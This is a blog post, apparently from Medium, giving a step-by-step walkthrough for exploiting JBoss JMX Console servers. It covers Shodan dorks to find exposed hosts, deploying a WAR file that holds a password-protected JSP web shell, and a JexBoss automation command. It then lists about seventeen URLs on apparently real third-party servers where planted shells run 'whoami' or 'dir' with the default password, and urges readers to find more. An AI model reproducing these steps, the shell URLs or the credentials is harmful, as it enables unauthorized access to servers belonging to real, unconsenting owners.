Exploiting JBoSS like a BOSS

SaN ThosH
SaN ThosH
Jul 24 · 3 min read

“So many Shells in so little time”

What is Jboss ?

JBoss Application Server (JBoss AS) is an open-source, cross-platform Java application server developed by JBoss, a division of Red Hat Inc. JBoss AS is an open-source implementation of Java 2 Enterprise Edition (J2EE) that is used for implementing Java applications and other Web-based applications and software.

JBoss contains a web accessible administrator page called the JMX Console. The JMX Console is ironically plagued by the same vulnerability as Apache Tomcat Manager because it is often deployed with default, weak, or even no credentials. Also comparable to Apache Tomcat Manager, JBoss allows administrators (and attackers) to upload and publish Web application ARchive (WAR) files remotely through this admin console.

Vulnerable versions -

JBoss Application Server versions: 3, 4, 5 and 6.

Paths to Check -

/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
/web-console/ServerInfo.jsp
/invoker/JMXInvokerServlet
/admin-console/

Manually Exploiting JBoss jmx-console -

  • Create the WAR file with our jsp shell
  • Hosting the WAR file on a server
  • Finding Publicly accessible jmx-console
  • Deploy the WAR file
  • Accessing the jsp shell

Shodan Dorks -

“x-powered-by” “jboss”
jboss http.favicon.hash:-656811182

Create the WAR file with our jsp shell -

I made a repository on GitHub with WAR file

WAR file consist of jsp shell

URL to access the shell -

/fs/shell.jsp?pass=secret&cmd=whoami

Hosting the WAR file on a server -

I used python to host it

python -m SimpleHTTPServer 8000

Finding Publicly accessible jmx-console -

Using shodan I found some

It looks like this

Deploy the WAR file -

Navigate to the JMX Console on the target host (http://IP:port/jmx-console/) and search for “service=MainDeployer”.

Now using the “void deploy()” we are going to deploy our WAR file

Since it allows you to enter a URL as a parameter value in java.net.URL. In this field, enter your attack IP and the name of the WAR file in the URL box and then click the “Invoke” button.

If it’s successfully deployed it will show a message like below

Accessing the jsp shell -

Jsp shell on the target can be found at /fs/shell.jsp

Note that the JSP shell from ‘RedTeam Pentesting’ requires a password. By default the password is “secret

http://203.196.40.169:8090/fs/shell.jsp?cmd=whoami&html=true&pass=secret

Automating using JexBoss -

joaomatosf wrote a Exploitation Tool for JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.

Usage-

python jexboss.py -host http://target_host:8080
http://103.38.15.81:8081/fs/shell.jsp?pass=secret&cmd=whoami
http://52.14.233.11:8080/fs/shell.jsp?pass=secret&cmd=whoami
http://34.197.157.79:8090//fs/shell.jsp?pass=secret&cmd=whoami
http://14.192.159.214:8080/fs/shell.jsp?pass=secret&cmd=whoami
https://13.232.144.35:8443/fs/shell.jsp?pass=secret&cmd=whoami
http://13.234.45.168:8080/fs/shell.jsp?pass=secret&cmd=dir
http://103.211.80.23:3541/fs/shell.jsp?pass=secret&cmd=whoami
http://190.48.127.45:8080/fs/shell.jsp?pass=secret&cmd=whoami
http://41.64.20.50:8080/fs/shell.jsp?pass=secret&cmd=whoami
http://203.196.40.169:8090/fs/shell.jsp?pass=secret&cmd=whoami
http://222.92.88.242:8086/fs/shell.jsp?pass=secret&cmd=whoami
http://200.18.67.52:8080/fs/shell.jsp?pass=secret&cmd=whoami
http://177.131.177.93:8080/fs/shell.jsp?pass=secret&cmd=whoami
http://177.131.177.93:8080/fs/shell.jsp?pass=secret&cmd=whoami
http://222.180.200.190:9080/fs/shell.jsp?pass=secret&cmd=whoami
http://59.89.197.92:8080/fs/shell.jsp?pass=secret&cmd=whoami
https://web.unimeditapetininga.com.br/fs/shell.jsp?pass=secret&cmd=dir
Go find some by yourself

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade